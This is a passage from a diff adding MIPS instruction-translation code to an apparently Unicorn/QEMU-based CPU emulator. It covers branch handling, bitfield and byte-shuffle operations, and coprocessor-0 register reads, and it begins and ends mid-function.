t1, l1); + break; + } + generate_exception(ctx, EXCP_TRAP); + gen_set_label(tcg_ctx, l1); + } + tcg_temp_free(tcg_ctx, t0); + tcg_temp_free(tcg_ctx, t1); +} + +static inline void gen_goto_tb(DisasContext *ctx, int n, target_ulong dest) +{ + TCGContext *tcg_ctx = ctx->uc->tcg_ctx; + TranslationBlock *tb; + tb = ctx->tb; + if ((tb->pc & TARGET_PAGE_MASK) == (dest & TARGET_PAGE_MASK) && + likely(!ctx->singlestep_enabled)) { + tcg_gen_goto_tb(tcg_ctx, n); + gen_save_pc(ctx, dest); + tcg_gen_exit_tb(tcg_ctx, (uintptr_t)tb + n); + } else { + gen_save_pc(ctx, dest); + if (ctx->singlestep_enabled) { + save_cpu_state(ctx, 0); + gen_helper_0e0i(tcg_ctx, raise_exception, EXCP_DEBUG); + } + tcg_gen_exit_tb(tcg_ctx, 0); + } +} + +/* Branches (before delay slot) */ +static void gen_compute_branch (DisasContext *ctx, uint32_t opc, + int insn_bytes, + int rs, int rt, int32_t offset, + int delayslot_size) +{ + TCGContext *tcg_ctx = ctx->uc->tcg_ctx; + TCGv **cpu_gpr = (TCGv **)tcg_ctx->cpu_gpr; + target_ulong btgt = -1; + int blink = 0; + int bcond_compute = 0; + TCGv t0 = tcg_temp_new(tcg_ctx); + TCGv t1 = tcg_temp_new(tcg_ctx); + + if (ctx->hflags & MIPS_HFLAG_BMASK) { +#ifdef MIPS_DEBUG_DISAS + LOG_DISAS("Branch in delay / forbidden slot at PC 0x" + TARGET_FMT_lx "\n", ctx->pc); +#endif + generate_exception(ctx, EXCP_RI); + goto out; + } + + /* Load needed operands */ + switch (opc) { + case OPC_BEQ: + case OPC_BEQL: + case OPC_BNE: + case OPC_BNEL: + /* Compare two registers */ + if (rs != rt) { + gen_load_gpr(ctx, t0, rs); + gen_load_gpr(ctx, t1, rt); + bcond_compute = 1; + } + btgt = ctx->pc + insn_bytes + offset; + break; + case OPC_BGEZ: + case OPC_BGEZAL: + case OPC_BGEZALL: + case OPC_BGEZL: + case OPC_BGTZ: + case OPC_BGTZL: + case OPC_BLEZ: + case OPC_BLEZL: + case OPC_BLTZ: + case OPC_BLTZAL: + case OPC_BLTZALL: + case OPC_BLTZL: + /* Compare to zero */ + if (rs != 0) { + gen_load_gpr(ctx, t0, rs); + bcond_compute = 1; + } + btgt = ctx->pc + insn_bytes + offset; + break; + case OPC_BPOSGE32: +#if defined(TARGET_MIPS64) + case OPC_BPOSGE64: + tcg_gen_andi_tl(tcg_ctx, t0, *(TCGv *)tcg_ctx->cpu_dspctrl, 0x7F); +#else + tcg_gen_andi_tl(tcg_ctx, t0, *(TCGv *)tcg_ctx->cpu_dspctrl, 0x3F); +#endif + bcond_compute = 1; + btgt = ctx->pc + insn_bytes + offset; + break; + case OPC_J: + case OPC_JAL: + case OPC_JALX: + /* Jump to immediate */ + btgt = ((ctx->pc + insn_bytes) & (int32_t)0xF0000000) | (uint32_t)offset; + break; + case OPC_JR: + case OPC_JALR: + /* Jump to register */ + if (offset != 0 && offset != 16) { + /* Hint = 0 is JR/JALR, hint 16 is JR.HB/JALR.HB, the + others are reserved. */ + MIPS_INVAL("jump hint"); + generate_exception(ctx, EXCP_RI); + goto out; + } + gen_load_gpr(ctx, *(TCGv *)tcg_ctx->btarget, rs); + break; + default: + MIPS_INVAL("branch/jump"); + generate_exception(ctx, EXCP_RI); + goto out; + } + if (bcond_compute == 0) { + /* No condition to be computed */ + switch (opc) { + case OPC_BEQ: /* rx == rx */ + case OPC_BEQL: /* rx == rx likely */ + case OPC_BGEZ: /* 0 >= 0 */ + case OPC_BGEZL: /* 0 >= 0 likely */ + case OPC_BLEZ: /* 0 <= 0 */ + case OPC_BLEZL: /* 0 <= 0 likely */ + /* Always take */ + ctx->hflags |= MIPS_HFLAG_B; + MIPS_DEBUG("balways"); + break; + case OPC_BGEZAL: /* 0 >= 0 */ + case OPC_BGEZALL: /* 0 >= 0 likely */ + /* Always take and link */ + blink = 31; + ctx->hflags |= MIPS_HFLAG_B; + MIPS_DEBUG("balways and link"); + break; + case OPC_BNE: /* rx != rx */ + case OPC_BGTZ: /* 0 > 0 */ + case OPC_BLTZ: /* 0 < 0 */ + /* Treat as NOP. */ + MIPS_DEBUG("bnever (NOP)"); + goto out; + case OPC_BLTZAL: /* 0 < 0 */ + /* Handle as an unconditional branch to get correct delay + slot checking. */ + blink = 31; + btgt = ctx->pc + insn_bytes + delayslot_size; + ctx->hflags |= MIPS_HFLAG_B; + MIPS_DEBUG("bnever and link"); + break; + case OPC_BLTZALL: /* 0 < 0 likely */ + tcg_gen_movi_tl(tcg_ctx, *cpu_gpr[31], ctx->pc + 8); + /* Skip the instruction in the delay slot */ + MIPS_DEBUG("bnever, link and skip"); + ctx->pc += 4; + goto out; + case OPC_BNEL: /* rx != rx likely */ + case OPC_BGTZL: /* 0 > 0 likely */ + case OPC_BLTZL: /* 0 < 0 likely */ + /* Skip the instruction in the delay slot */ + MIPS_DEBUG("bnever and skip"); + ctx->pc += 4; + goto out; + case OPC_J: + ctx->hflags |= MIPS_HFLAG_B; + MIPS_DEBUG("j " TARGET_FMT_lx, btgt); + break; + case OPC_JALX: + ctx->hflags |= MIPS_HFLAG_BX; + /* Fallthrough */ + case OPC_JAL: + blink = 31; + ctx->hflags |= MIPS_HFLAG_B; + MIPS_DEBUG("jal " TARGET_FMT_lx, btgt); + break; + case OPC_JR: + ctx->hflags |= MIPS_HFLAG_BR; + MIPS_DEBUG("jr %s", regnames[rs]); + break; + case OPC_JALR: + blink = rt; + ctx->hflags |= MIPS_HFLAG_BR; + MIPS_DEBUG("jalr %s, %s", regnames[rt], regnames[rs]); + break; + default: + MIPS_INVAL("branch/jump"); + generate_exception(ctx, EXCP_RI); + goto out; + } + } else { + switch (opc) { + case OPC_BEQ: + tcg_gen_setcond_tl(tcg_ctx, TCG_COND_EQ, *(TCGv *)tcg_ctx->bcond, t0, t1); + MIPS_DEBUG("beq %s, %s, " TARGET_FMT_lx, + regnames[rs], regnames[rt], btgt); + goto not_likely; + case OPC_BEQL: + tcg_gen_setcond_tl(tcg_ctx, TCG_COND_EQ, *(TCGv *)tcg_ctx->bcond, t0, t1); + MIPS_DEBUG("beql %s, %s, " TARGET_FMT_lx, + regnames[rs], regnames[rt], btgt); + goto likely; + case OPC_BNE: + tcg_gen_setcond_tl(tcg_ctx, TCG_COND_NE, *(TCGv *)tcg_ctx->bcond, t0, t1); + MIPS_DEBUG("bne %s, %s, " TARGET_FMT_lx, + regnames[rs], regnames[rt], btgt); + goto not_likely; + case OPC_BNEL: + tcg_gen_setcond_tl(tcg_ctx, TCG_COND_NE, *(TCGv *)tcg_ctx->bcond, t0, t1); + MIPS_DEBUG("bnel %s, %s, " TARGET_FMT_lx, + regnames[rs], regnames[rt], btgt); + goto likely; + case OPC_BGEZ: + tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_GE, *(TCGv *)tcg_ctx->bcond, t0, 0); + MIPS_DEBUG("bgez %s, " TARGET_FMT_lx, regnames[rs], btgt); + goto not_likely; + case OPC_BGEZL: + tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_GE, *(TCGv *)tcg_ctx->bcond, t0, 0); + MIPS_DEBUG("bgezl %s, " TARGET_FMT_lx, regnames[rs], btgt); + goto likely; + case OPC_BGEZAL: + tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_GE, *(TCGv *)tcg_ctx->bcond, t0, 0); + MIPS_DEBUG("bgezal %s, " TARGET_FMT_lx, regnames[rs], btgt); + blink = 31; + goto not_likely; + case OPC_BGEZALL: + tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_GE, *(TCGv *)tcg_ctx->bcond, t0, 0); + blink = 31; + MIPS_DEBUG("bgezall %s, " TARGET_FMT_lx, regnames[rs], btgt); + goto likely; + case OPC_BGTZ: + tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_GT, *(TCGv *)tcg_ctx->bcond, t0, 0); + MIPS_DEBUG("bgtz %s, " TARGET_FMT_lx, regnames[rs], btgt); + goto not_likely; + case OPC_BGTZL: + tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_GT, *(TCGv *)tcg_ctx->bcond, t0, 0); + MIPS_DEBUG("bgtzl %s, " TARGET_FMT_lx, regnames[rs], btgt); + goto likely; + case OPC_BLEZ: + tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_LE, *(TCGv *)tcg_ctx->bcond, t0, 0); + MIPS_DEBUG("blez %s, " TARGET_FMT_lx, regnames[rs], btgt); + goto not_likely; + case OPC_BLEZL: + tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_LE, *(TCGv *)tcg_ctx->bcond, t0, 0); + MIPS_DEBUG("blezl %s, " TARGET_FMT_lx, regnames[rs], btgt); + goto likely; + case OPC_BLTZ: + tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_LT, *(TCGv *)tcg_ctx->bcond, t0, 0); + MIPS_DEBUG("bltz %s, " TARGET_FMT_lx, regnames[rs], btgt); + goto not_likely; + case OPC_BLTZL: + tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_LT, *(TCGv *)tcg_ctx->bcond, t0, 0); + MIPS_DEBUG("bltzl %s, " TARGET_FMT_lx, regnames[rs], btgt); + goto likely; + case OPC_BPOSGE32: + tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_GE, *(TCGv *)tcg_ctx->bcond, t0, 32); + MIPS_DEBUG("bposge32 " TARGET_FMT_lx, btgt); + goto not_likely; +#if defined(TARGET_MIPS64) + case OPC_BPOSGE64: + tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_GE, *(TCGv *)tcg_ctx->bcond, t0, 64); + MIPS_DEBUG("bposge64 " TARGET_FMT_lx, btgt); + goto not_likely; +#endif + case OPC_BLTZAL: + tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_LT, *(TCGv *)tcg_ctx->bcond, t0, 0); + blink = 31; + MIPS_DEBUG("bltzal %s, " TARGET_FMT_lx, regnames[rs], btgt); + not_likely: + ctx->hflags |= MIPS_HFLAG_BC; + break; + case OPC_BLTZALL: + tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_LT, *(TCGv *)tcg_ctx->bcond, t0, 0); + blink = 31; + MIPS_DEBUG("bltzall %s, " TARGET_FMT_lx, regnames[rs], btgt); + likely: + ctx->hflags |= MIPS_HFLAG_BL; + break; + default: + MIPS_INVAL("conditional branch/jump"); + generate_exception(ctx, EXCP_RI); + goto out; + } + } + MIPS_DEBUG("enter ds: link %d cond %02x target " TARGET_FMT_lx, + blink, ctx->hflags, btgt); + + ctx->btarget = btgt; + + switch (delayslot_size) { + case 2: + ctx->hflags |= MIPS_HFLAG_BDS16; + break; + case 4: + ctx->hflags |= MIPS_HFLAG_BDS32; + break; + } + + if (blink > 0) { + int post_delay = insn_bytes + delayslot_size; + int lowbit = !!(ctx->hflags & MIPS_HFLAG_M16); + + tcg_gen_movi_tl(tcg_ctx, *cpu_gpr[blink], ctx->pc + post_delay + lowbit); + } + + out: + if (insn_bytes == 2) + ctx->hflags |= MIPS_HFLAG_B16; + tcg_temp_free(tcg_ctx, t0); + tcg_temp_free(tcg_ctx, t1); +} + +/* special3 bitfield operations */ +static void gen_bitops (DisasContext *ctx, uint32_t opc, int rt, + int rs, int lsb, int msb) +{ + TCGContext *tcg_ctx = ctx->uc->tcg_ctx; + TCGv t0 = tcg_temp_new(tcg_ctx); + TCGv t1 = tcg_temp_new(tcg_ctx); + + gen_load_gpr(ctx, t1, rs); + switch (opc) { + case OPC_EXT: + if (lsb + msb > 31) + goto fail; + tcg_gen_shri_tl(tcg_ctx, t0, t1, lsb); + if (msb != 31) { + tcg_gen_andi_tl(tcg_ctx, t0, t0, (1U << (msb + 1)) - 1); + } else { + tcg_gen_ext32s_tl(tcg_ctx, t0, t0); + } + break; +#if defined(TARGET_MIPS64) + case OPC_DEXTM: + tcg_gen_shri_tl(tcg_ctx, t0, t1, lsb); + if (msb != 31) { + tcg_gen_andi_tl(tcg_ctx, t0, t0, (1ULL << (msb + 1 + 32)) - 1); + } + break; + case OPC_DEXTU: + tcg_gen_shri_tl(tcg_ctx, t0, t1, lsb + 32); + tcg_gen_andi_tl(tcg_ctx, t0, t0, (1ULL << (msb + 1)) - 1); + break; + case OPC_DEXT: + tcg_gen_shri_tl(tcg_ctx, t0, t1, lsb); + tcg_gen_andi_tl(tcg_ctx, t0, t0, (1ULL << (msb + 1)) - 1); + break; +#endif + case OPC_INS: + if (lsb > msb) + goto fail; + gen_load_gpr(ctx, t0, rt); + tcg_gen_deposit_tl(tcg_ctx, t0, t0, t1, lsb, msb - lsb + 1); + tcg_gen_ext32s_tl(tcg_ctx, t0, t0); + break; +#if defined(TARGET_MIPS64) + case OPC_DINSM: + gen_load_gpr(ctx, t0, rt); + tcg_gen_deposit_tl(tcg_ctx, t0, t0, t1, lsb, msb + 32 - lsb + 1); + break; + case OPC_DINSU: + gen_load_gpr(ctx, t0, rt); + tcg_gen_deposit_tl(tcg_ctx, t0, t0, t1, lsb + 32, msb - lsb + 1); + break; + case OPC_DINS: + gen_load_gpr(ctx, t0, rt); + tcg_gen_deposit_tl(tcg_ctx, t0, t0, t1, lsb, msb - lsb + 1); + break; +#endif + default: +fail: + MIPS_INVAL("bitops"); + generate_exception(ctx, EXCP_RI); + tcg_temp_free(tcg_ctx, t0); + tcg_temp_free(tcg_ctx, t1); + return; + } + gen_store_gpr(tcg_ctx, t0, rt); + tcg_temp_free(tcg_ctx, t0); + tcg_temp_free(tcg_ctx, t1); +} + +static void gen_bshfl (DisasContext *ctx, uint32_t op2, int rt, int rd) +{ + TCGContext *tcg_ctx = ctx->uc->tcg_ctx; + TCGv **cpu_gpr = (TCGv **)tcg_ctx->cpu_gpr; + TCGv t0; + + if (rd == 0) { + /* If no destination, treat it as a NOP. */ + MIPS_DEBUG("NOP"); + return; + } + + t0 = tcg_temp_new(tcg_ctx); + gen_load_gpr(ctx, t0, rt); + switch (op2) { + case OPC_WSBH: + { + TCGv t1 = tcg_temp_new(tcg_ctx); + + tcg_gen_shri_tl(tcg_ctx, t1, t0, 8); + tcg_gen_andi_tl(tcg_ctx, t1, t1, 0x00FF00FF); + tcg_gen_shli_tl(tcg_ctx, t0, t0, 8); + tcg_gen_andi_tl(tcg_ctx, t0, t0, ~0x00FF00FF); + tcg_gen_or_tl(tcg_ctx, t0, t0, t1); + tcg_temp_free(tcg_ctx, t1); + tcg_gen_ext32s_tl(tcg_ctx, *cpu_gpr[rd], t0); + } + break; + case OPC_SEB: + tcg_gen_ext8s_tl(tcg_ctx, *cpu_gpr[rd], t0); + break; + case OPC_SEH: + tcg_gen_ext16s_tl(tcg_ctx, *cpu_gpr[rd], t0); + break; +#if defined(TARGET_MIPS64) + case OPC_DSBH: + { + TCGv t1 = tcg_temp_new(tcg_ctx); + + tcg_gen_shri_tl(tcg_ctx, t1, t0, 8); + tcg_gen_andi_tl(tcg_ctx, t1, t1, 0x00FF00FF00FF00FFULL); + tcg_gen_shli_tl(tcg_ctx, t0, t0, 8); + tcg_gen_andi_tl(tcg_ctx, t0, t0, ~0x00FF00FF00FF00FFULL); + tcg_gen_or_tl(tcg_ctx, *cpu_gpr[rd], t0, t1); + tcg_temp_free(tcg_ctx, t1); + } + break; + case OPC_DSHD: + { + TCGv t1 = tcg_temp_new(tcg_ctx); + + tcg_gen_shri_tl(tcg_ctx, t1, t0, 16); + tcg_gen_andi_tl(tcg_ctx, t1, t1, 0x0000FFFF0000FFFFULL); + tcg_gen_shli_tl(tcg_ctx, t0, t0, 16); + tcg_gen_andi_tl(tcg_ctx, t0, t0, ~0x0000FFFF0000FFFFULL); + tcg_gen_or_tl(tcg_ctx, t0, t0, t1); + tcg_gen_shri_tl(tcg_ctx, t1, t0, 32); + tcg_gen_shli_tl(tcg_ctx, t0, t0, 32); + tcg_gen_or_tl(tcg_ctx, *cpu_gpr[rd], t0, t1); + tcg_temp_free(tcg_ctx, t1); + } + break; +#endif + default: + MIPS_INVAL("bsfhl"); + generate_exception(ctx, EXCP_RI); + tcg_temp_free(tcg_ctx, t0); + return; + } + tcg_temp_free(tcg_ctx, t0); +} + +#ifndef CONFIG_USER_ONLY +/* CP0 (MMU and control) */ +static inline void gen_mfc0_load32 (DisasContext *ctx, TCGv arg, target_ulong off) +{ + TCGContext *tcg_ctx = ctx->uc->tcg_ctx; + TCGv_i32 t0 = tcg_temp_new_i32(tcg_ctx); + + tcg_gen_ld_i32(tcg_ctx, t0, tcg_ctx->cpu_env, off); + tcg_gen_ext_i32_tl(tcg_ctx, arg, t0); + tcg_temp_free_i32(tcg_ctx, t0); +} + +static inline void gen_mfc0_load64 (DisasContext *ctx, TCGv arg, target_ulong off) +{ + TCGContext *tcg_ctx = ctx->uc->tcg_ctx; + tcg_gen_ld_tl(tcg_ctx, arg, tcg_ctx->cpu_env, off); + tcg_gen_ext32s_tl(tcg_ctx, arg, arg); +} + +static inline void gen_mtc0_store32 (DisasContext *ctx, TCGv arg, target_ulong off) +{ + TCGContext *tcg_ctx = ctx->uc->tcg_ctx; + TCGv_i32 t0 = tcg_temp_new_i32(tcg_ctx); + + tcg_gen_trunc_tl_i32(tcg_ctx, t0, arg); + tcg_gen_st_i32(tcg_ctx, t0, tcg_ctx->cpu_env, off); + tcg_temp_free_i32(tcg_ctx, t0); +} + +static inline void gen_mtc0_store64 (DisasContext *ctx, TCGv arg, target_ulong off) +{ + TCGContext *tcg_ctx = ctx->uc->tcg_ctx; + tcg_gen_ext32s_tl(tcg_ctx, arg, arg); + tcg_gen_st_tl(tcg_ctx, arg, tcg_ctx->cpu_env, off); +} + +static inline void gen_mfc0_unimplemented(DisasContext *ctx, TCGv arg) +{ + TCGContext *tcg_ctx = ctx->uc->tcg_ctx; + if (ctx->insn_flags & ISA_MIPS32R6) { + tcg_gen_movi_tl(tcg_ctx, arg, 0); + } else { + tcg_gen_movi_tl(tcg_ctx, arg, ~0); + } +} + +#define CP0_CHECK(c) \ + do { \ + if (!(c)) { \ + goto cp0_unimplemented; \ + } \ + } while (0) + +static void gen_mfc0(DisasContext *ctx, TCGv arg, int reg, int sel) +{ + TCGContext *tcg_ctx = ctx->uc->tcg_ctx; + const char *rn = "invalid"; + + if (sel != 0) + check_insn(ctx, ISA_MIPS32); + + switch (reg) { + case 0: + switch (sel) { + case 0: + gen_mfc0_load32(ctx, arg, offsetof(CPUMIPSState, CP0_Index)); + rn = "Index"; + break; + case 1: + CP0_CHECK(ctx->insn_flags & ASE_MT); + gen_helper_mfc0_mvpcontrol(tcg_ctx, arg, tcg_ctx->cpu_env); + rn = "MVPControl"; + break; + case 2: + CP0_CHECK(ctx->insn_flags & ASE_MT); + gen_helper_mfc0_mvpconf0(tcg_ctx, arg, tcg_ctx->cpu_env); + rn = "MVPConf0"; + break; + case 3: + CP0_CHECK(ctx->insn_flags & ASE_MT); + gen_helper_mfc0_mvpconf1(tcg_ctx, arg, tcg_ctx->cpu_env); + rn = "MVPConf1"; + break; + default: + goto cp0_unimplemented; + } + break; + case 1: + switch (sel) { + case 0: + CP0_CHECK(!(ctx->insn_flags & ISA_MIPS32R6)); + gen_helper_mfc0_random(tcg_ctx, arg, tcg_ctx->cpu_env); + rn = "Random"; + break; + case 1: + CP0_CHECK(ctx->insn_flags & ASE_MT); + gen_mfc0_load32(ctx, arg, offsetof(CPUMIPSState, CP0_VPEControl)); + rn = "VPEControl"; + break; + case 2: + CP0_CHECK(ctx->insn_flags & ASE_MT); + gen_mfc0_load32(ctx, arg, offsetof(CPUMIPSState, CP0_VPEConf0)); + rn = "VPEConf0"; + break; + case 3: + CP0_CHECK(ctx->insn_flags & ASE_MT); + gen_mfc0_load32(ctx, arg, offsetof(CPUMIPSState, CP0_VPEConf1)); + rn = "VPEConf1"; + break; + case 4: + CP0_CHECK(ctx->insn_flags & ASE_MT); + gen_mfc0_load64(ctx, arg, offsetof(CPUMIPSState, CP0_YQMask)); + rn = "YQMask"; + break; + case 5: + CP0_CHECK(ctx->insn_flags & ASE_MT); + gen_mfc0_load64(ctx, arg, offsetof(CPUMIPSState, CP0_VPESchedule)); + rn = "VPESchedule"; + break; + case 6: + CP0_CHECK(ctx->insn_flags & ASE_MT); + gen_mfc0_load64(ctx, arg, offsetof(CPUMIPSState, CP0_VPEScheFBack)); + rn = "VPEScheFBack"; + break; + case 7: + CP0_CHECK(ctx->insn_flags & ASE_MT); + gen_mfc0_load32(ctx, arg, offsetof(CPUMIPSState, CP0_VPEOpt)); + rn = "VPEOpt"; + break; + default: + goto cp0_unimplemented; + } + break; + case 2: + switch (sel) { + case 0: + tcg_gen_ld_tl(tcg_ctx, arg, tcg_ctx->cpu_env, offsetof(CPUMIPSState, CP0_EntryLo0)); +#if defined(TARGET_MIPS64) + if (ctx->rxi) { + TCGv tmp = tcg_temp_new(tcg_ctx); + tcg_gen_andi_tl(tcg_ctx, tmp, arg, (3ull << 62)); + tcg_gen_shri_tl(tcg_ctx, tmp, tmp, 32); + tcg_gen_or_tl(tcg_ctx, arg, arg, tmp); + tcg_temp_free(tcg_ctx, tmp); + } +#endif + tcg_gen_ext32s_tl(tcg_ctx, arg, arg); + rn = "EntryLo0"; + break; + case 1: + CP0_CHECK(ctx->insn_flags & ASE_MT); + gen_helper_mfc0_tcstatus(tcg_ctx, arg, tcg_ctx->cpu_env); + rn = "TCStatus"; + break; + case 2: + CP0_CHECK(ctx->insn_flags & ASE_MT); + gen_helper_mfc0_tcbind(tcg_ctx, arg, tcg_ctx->cpu_env); + rn = "TCBind"; + break; + case 3: + CP0_CHECK(ctx->insn_flags & ASE_MT); + gen_helper_mfc0_tcrestart(tcg_ctx, arg, tcg_ctx->cpu_env); + rn = "TCRestart"; + break; + case 4: + CP0_CHECK(ctx->insn_flags & ASE_MT); + gen_helper_mfc0_tchalt(tcg_ctx, arg, tcg_ctx->cpu_env); + rn = "TCHalt"; + break; + case 5: + CP0_CHECK(ctx->insn_flags & ASE_MT); + gen_helper_mfc0_tccontext(tcg_ctx, arg, tcg_ctx->cpu_env); + rn = "TCContext"; + break; + case 6: + CP0_CHECK(ctx->insn_flags & ASE_MT); + gen_helper_mfc0_tcschedule(tcg_ctx, arg, tcg_ctx->cpu_env); + rn = "TCSchedule"; + break; + case 7: + CP0_CHECK(ctx->insn_flags & ASE_MT); + gen_helper_mfc0_tcschefback(tcg_ctx, arg, tcg_ctx->cpu_env); + rn = "TCScheFBack"; + break; + default: + goto cp0_unimplemented; + } + break; + case 3: + switch (sel) { + case 0: + tcg_gen_ld_tl(tcg_ctx, arg, tcg_ctx->cpu_env, offsetof(CPUMIPSState, CP0_EntryLo1)); +#if defined(TARGET_MIPS64) + if (ctx->rxi) { + TCGv tmp = tcg_temp_new(tcg_ctx); + tcg_gen_andi_tl(tcg_ctx, tmp, arg, (3ull << 62)); + tcg_gen_shri_tl(tcg_ctx, tmp, tmp, 32); + tcg_gen_or_tl(tcg_ctx, arg, arg, tmp); + tcg_temp_free(tcg_ctx, tmp); + } +#endif + tcg_gen_ext32s_tl(tcg_ctx, arg, arg); + rn = "EntryLo1"; + break; + default: + goto cp0_unimplemented; + } + break; + case 4: + switch (sel) { + case 0: + tcg_gen_ld_tl(tcg_ctx, arg, tcg_ctx->cpu_env, offsetof(CPUMIPSState, CP0_Context)); + tcg_gen_ext32s_tl(tcg_ctx, arg, arg); + rn = "Context"; + break; + case 1: +// gen_helper_mfc0_contextconfig(arg); /* SmartMIPS ASE */ + rn = "ContextConfig"; + goto cp0_unimplemented; +// break; + case 2: + CP0_CHECK(ctx->ulri); + tcg_gen_ld32s_tl(tcg_ctx, arg, tcg_ctx->cpu_env, + offsetof(CPUMIPSState, active_tc.CP0_UserLocal)); + rn = "UserLocal"; + break; + default: + goto cp0_unimplemented; + } + break; + case 5: + switch (sel) { + case 0: + gen_mfc0_load32(ctx, arg, offsetof(CPUMIPSState, CP0_PageMask)); + rn = "PageMask"; + break; + case 1: + check_insn(ctx, ISA_MIPS32R2); + gen_mfc0_load32(ctx, arg, offsetof(CPUMIPSState, CP0_PageGrain)); + rn = "PageGrain"; + break; + default: + goto cp0_unimplemented; + } + break; + case 6: + switch (sel) { + case 0: + gen_mfc0_load32(ctx, arg, offsetof(CPUMIPSState, CP0_Wired)); + rn = "Wired"; + break; + case 1: + check_insn(ctx, ISA_MIPS32R2); + gen_mfc0_load32(ctx, arg, offsetof(CPUMIPSState, CP0_SRSConf0)); + rn = "SRSConf0"; + break; + case 2: + check_insn(ctx, ISA_MIPS32R2); + gen_mfc0_load32(ctx, arg, offsetof(CPUMIPSState, CP0_SRSConf1)); + rn = "SRSConf1"; + break; + case 3: + check_insn(ctx, ISA_MIPS32R2); + gen_mfc0_load32(ctx, arg, offsetof(CPUMIPSState, CP0_SRSConf2)); + rn = "SRSConf2"; + break; + case 4: + check_insn(ctx, ISA_MIPS32R2); + gen_mfc0_load32(ctx, arg, offsetof(CPUMIPSState, CP0_SRSConf3)); + rn = "SRSConf3"; + break; + case 5: + check_insn(ctx, ISA_MIPS32R2); + gen_mfc0_load32(ctx, arg, offsetof(CPUMIPSState, CP0_SRSConf4)); + rn = "SRSConf4"; + break; + default: + goto cp0_unimplemented; + } + break; + case 7: + switch (sel) { + case 0: + check_insn(ctx, ISA_MIPS32R2); + gen_mfc0_load32(ctx, arg, offsetof(CPUMIPSState, CP0_HWREna)); + rn = "HWREna"; + break; + default: + goto cp0_unimplemented; + } + break; + case 8: + switch (sel) { + case 0: + tcg_gen_ld_tl(tcg_ctx, arg, tcg_ctx->cpu_env, offsetof(CPUMIPSState, CP0_BadVAddr)); + tcg_gen_ext32s_tl(tcg_ctx, arg, arg); + rn = "BadVAddr"; + break; + case 1: + CP0_CHECK(ctx->bi); + gen_mfc0_load32(ctx, arg, offsetof(CPUMIPSState, CP0_BadInstr)); + rn = "BadInstr"; + break; + case 2: + CP0_CHECK(ctx->bp); + gen_mfc0_load32(ctx, arg, offsetof(CPUMIPSState, CP0_BadInstrP)); + rn = "BadInstrP"; + break; + default: + goto cp0_unimplemented; + } + break; + case 9: + switch (sel) { + case 0: + /* Mark as an IO operation because we read the time. */ + //if (use_icount) + // gen_io_start(); + gen_helper_mfc0_count(tcg_ctx, arg, tcg_ctx->cpu_env); + //if (use_icount) { + // gen_io_end(); + //} + /* Break the TB to be able to take timer interrupts immediately + after reading count. */ + ctx->bstate = BS_STOP; + rn = "Count"; + break; + /* 6,7 are implementation dependent */ + default: + goto cp0_unimplemented; + } + break; + case 10: + switch (sel) { + case 0: + tcg_gen_ld_tl(tcg_ctx, arg, tcg_ctx->cpu_env, offsetof(CPUMIPSState, CP0_EntryHi)); + tcg_gen_ext32s_tl(tcg_ctx, arg, arg); + rn = "EntryHi"; + break; + default: + goto cp0_unimplemented; + } + break; + case 11: + switch (sel) { + case 0: + gen_mfc0_load32(ctx, arg, offsetof(CPUMIPSState, CP0_Compare)); + rn = "Compare"; + break; + /* 6,7 are implementation dependent */ + default: + goto cp0_unimplemented; + } + break; + case 12: + switch (sel) { + case 0: + gen_mfc0_load32(ctx, arg, offsetof(CPUMIPSState, CP0_Status)); + rn = "Status"; + break; + case 1: + check_insn(ctx, ISA_MIPS32R2); + gen_mfc0_load32(ctx, arg, offsetof(CPUMIPSState, CP0_IntCtl)); + rn = "IntCtl"; + break; + case 2: + check_insn(ctx, ISA_MIPS32R2); + gen_mfc0_load32(ctx, arg, offsetof(CPUMIPSState, CP0_SRSCtl)); + rn = "SRSCtl"; + break; + case 3: + check_insn(ctx, ISA_MIPS32R2); + gen_mfc0_load32(ctx, arg, offsetof(CPUMIPSState, CP0_SRSMap)); + rn = "SRSMap"; + break; + default: + goto cp0_unimplemented; + } + break; + case 13: + switch (sel) { + case 0: + gen_mfc0_load32(ctx, arg, offsetof(CPUMIPSState, CP0_Cause)); + rn = "Cause"; + break; + default: + goto cp0_unimplemented; + } + break; + case 14: + switch (sel) { + case 0: + tcg_gen_ld_tl(tcg_ctx, arg, tcg_ctx->cpu_env, offsetof(CPUMIPSState, CP0_EPC)); + tcg_gen_ext32s_tl(tcg_ctx, arg, arg); + rn = "EPC"; + break; + default: + goto cp0_unimplemented; + } + break; + case 15: + switch (sel) { + case 0: + gen_mfc0_load32(ctx, arg, offsetof(CPUMIPSState, CP0_PRid)); + rn = "PRid"; + break; + case 1: + check_insn(ctx, ISA_MIPS32R2); + gen_mfc0_load32(ctx, arg, offsetof(CPUMIPSState, CP0_EBase)); + rn = "EBase"; + break; + default: + goto cp0_unimplemented; + } + break; + case 16: + switch (sel) { + case 0: + gen_mfc0_load32(ctx, arg, offsetof(CPUMIPSState, CP0_Config0)); + rn = "Config"; + break; + case 1: + gen_mfc0_load32(ctx, arg, offsetof(CPUMIPSState, CP0_Config1)); + rn = "Config1"; + break; + case 2: + gen_mfc0_load32(ctx, arg, offsetof(CPUMIPSState, CP0_Config2)); + rn = "Config2"; + break; + case 3: + gen_mfc0_load32(ctx, arg, offsetof(CPUMIPSState, CP0_Config3)); + rn = "Config3"; + break; + case 4: + gen_mfc0_load32(ctx, arg, offsetof(CPUMIPSState, CP0_Config4)); + rn = "Config4"; + break; + case 5: + gen_mfc0_load32(ctx, arg, offsetof(CPUMIPSState, CP0_Config5)); + rn = "Config5"; + break; + /* 6,7 are implementation dependent */ + case 6: + gen_mfc0_load32(ctx, arg, offsetof(CPUMIPSState, CP0_Config6)); + rn = "Config6"; + break; + case 7: + gen_mfc0_load32(ctx, arg, offsetof(CPUMIPSState, CP0_Config7)); + rn = "Config7"; + break; + default: + goto cp0_unimplemented; + } + break; + case 17: + switch (sel) { + case 0: + gen_helper_mfc0_lladdr(tcg_ctx, arg, tcg_ctx->cpu_env); + rn = 